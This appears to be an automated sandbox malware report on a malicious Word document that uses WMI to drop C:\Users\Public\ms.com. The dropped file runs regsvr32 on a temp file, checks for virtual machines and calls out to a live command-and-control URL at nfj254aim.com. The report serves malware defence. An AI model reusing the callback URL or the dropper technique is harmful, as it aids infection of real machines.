Source: C:\Users\Public\ms.comCode function: 1_2_00B31460 #650,SetProcessDEPPolicy,rand_s,VirtualAlloc,GetVersion,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,FreeLibrary,RegOpenKeyExA,RegQueryValueExA,ExpandEnvironmentStringsA,LoadLibraryA,RegCloseKey,GetModuleHandleW,GetProcAddress,MultiByteToWideChar,RegisterApplicationRestart,GetProcAddress,FreeLibrary,RegCloseKey,1_2_00B31460
Source: C:\Users\Public\ms.comCode function: 1_2_00B32091 push ecx; ret 1_2_00B320A4

Persistence and Installation Behavior:

barindex
Creates processes via WMIShow sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::create
Drops PE files with a suspicious file extensionShow sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\Public\ms.comJump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\Public\ms.comJump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\Public\ms.comJump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directoryShow sources
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEFile created: C:\Users\Public\ms.comJump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\ms.comProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\ms.comProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\ms.comProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\Public\ms.comMemory allocated: 4F10000 memory reserve | memory write watchJump to behavior
Source: C:\Users\Public\ms.comMemory allocated: 63F0000 memory commit | memory reserve | memory write watchJump to behavior
Source: C:\Users\Public\ms.comMemory allocated: 6570000 memory commit | memory reserve | memory write watchJump to behavior
Source: C:\Users\Public\ms.comMemory allocated: 65B0000 memory reserve | memory write watchJump to behavior
Source: C:\Users\Public\ms.comMemory allocated: 6730000 memory commit | memory reserve | memory write watchJump to behavior
Source: C:\Users\Public\ms.comMemory allocated: 6B50000 memory commit | memory reserve | memory write watchJump to behavior
Source: C:\Users\Public\ms.comMemory allocated: 6BB0000 memory commit | memory reserve | memory write watchJump to behavior
Source: C:\Users\Public\ms.comMemory allocated: 6BD0000 memory commit | memory reserve | memory write watchJump to behavior
Source: C:\Users\Public\ms.comMemory allocated: 6BF0000 memory commit | memory reserve | memory write watchJump to behavior
Source: C:\Users\Public\ms.comFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
Source: ms.com, 00000001.00000002.229166910.0000000006E10000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: ms.com, 00000001.00000003.222604745.0000000006A46000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: ms.com, 00000001.00000002.229166910.0000000006E10000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: ms.com, 00000001.00000002.229166910.0000000006E10000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: ms.com, 00000001.00000002.229166910.0000000006E10000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\Public\ms.comCode function: 1_2_00B31460 #650,SetProcessDEPPolicy,rand_s,VirtualAlloc,GetVersion,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,FreeLibrary,RegOpenKeyExA,RegQueryValueExA,ExpandEnvironmentStringsA,LoadLibraryA,RegCloseKey,GetModuleHandleW,GetProcAddress,MultiByteToWideChar,RegisterApplicationRestart,GetProcAddress,FreeLibrary,RegCloseKey,1_2_00B31460
Source: C:\Users\Public\ms.comCode function: 1_2_00B31F11 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00B31F11
Source: C:\Users\Public\ms.comProcess created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Users\user\AppData\Local\Temp\temp.tmpJump to behavior
Source: C:\Users\Public\ms.comCode function: 1_2_00B31DC3 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,1_2_00B31DC3
Source: C:\Users\Public\ms.comCode function: 1_2_00B31460 #650,SetProcessDEPPolicy,rand_s,VirtualAlloc,GetVersion,GetModuleHandleW,GetProcAddress,LoadLibraryW,GetProcAddress,FreeLibrary,RegOpenKeyExA,RegQueryValueExA,ExpandEnvironmentStringsA,LoadLibraryA,RegCloseKey,GetModuleHandleW,GetProcAddress,MultiByteToWideChar,RegisterApplicationRestart,GetProcAddress,FreeLibrary,RegCloseKey,1_2_00B31460

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation11DLL Side-Loading1Process Injection11Masquerading211OS Credential DumpingSystem Time Discovery1Remote ServicesEmail Collection1Exfiltration Over Other Network MediumIngress Tool Transfer1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsCommand and Scripting Interpreter2Boot or Logon Initialization ScriptsDLL Side-Loading1Virtualization/Sandbox Evasion2LSASS MemorySecurity Software Discovery11Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsScripting2Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerVirtualization/Sandbox Evasion2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol12Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsNative API1Logon Script (Mac)Logon Script (Mac)Scripting2NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsExploitation for Client Execution13Network Logon ScriptNetwork Logon ScriptObfuscated Files or Information1LSA SecretsFile and Directory Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonDLL Side-Loading1Cached Domain CredentialsSystem Information Discovery6VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
documenti 12.01.20.doc29%VirustotalBrowse
documenti 12.01.20.doc100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\Public\ms.com0%MetadefenderBrowse
C:\Users\Public\ms.com0%ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://cdn.entity.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://wus2-000.contentsync.0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://powerlift.acompli.net0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
http://nfj254aim.com/analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rwwHf1xOO/7n6dDzF/xspcd2?RltAN=vsETwS&G_=Ro_LgyQulrPjxaAj&wixw=XYJCRUJhgYHPY&bkUOD=AXjbvUQDbTcWkz0%Avira URL Cloudsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
http://nfj254aim.com/analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rw0%Avira URL Cloudsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
nfj254aim.com
104.28.6.227
truefalse
    unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://nfj254aim.com/analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rwwHf1xOO/7n6dDzF/xspcd2?RltAN=vsETwS&G_=Ro_LgyQulrPjxaAj&wixw=XYJCRUJhgYHPY&bkUOD=AXjbvUQDbTcWkzfalse
    • Avira URL Cloud: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.com03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
      high
      https://login.microsoftonline.com/03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
        high
        https://shell.suite.office.com:144303A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
              high
              https://cdn.entity.03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/query03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                high
                https://wus2-000.contentsync.03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://clients.config.office.net/user/v1.0/tenantassociationkey03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                    high
                    https://powerlift.acompli.net03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.com03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v103A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                      high
                      https://cortana.ai03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspx03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.com03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                high
                                https://api.aadrm.com/03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                      high
                                      https://cr.office.com03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControl03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/Office03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                            high
                                            https://graph.ppe.windows.net03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptionevents03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.net03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.com03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/work03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplate03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://wus2-000.pagecontentsync.03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.com03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplate03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetect03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.ms03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groups03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                            high
                                                            https://graph.windows.net03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.com03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/api03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetect03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
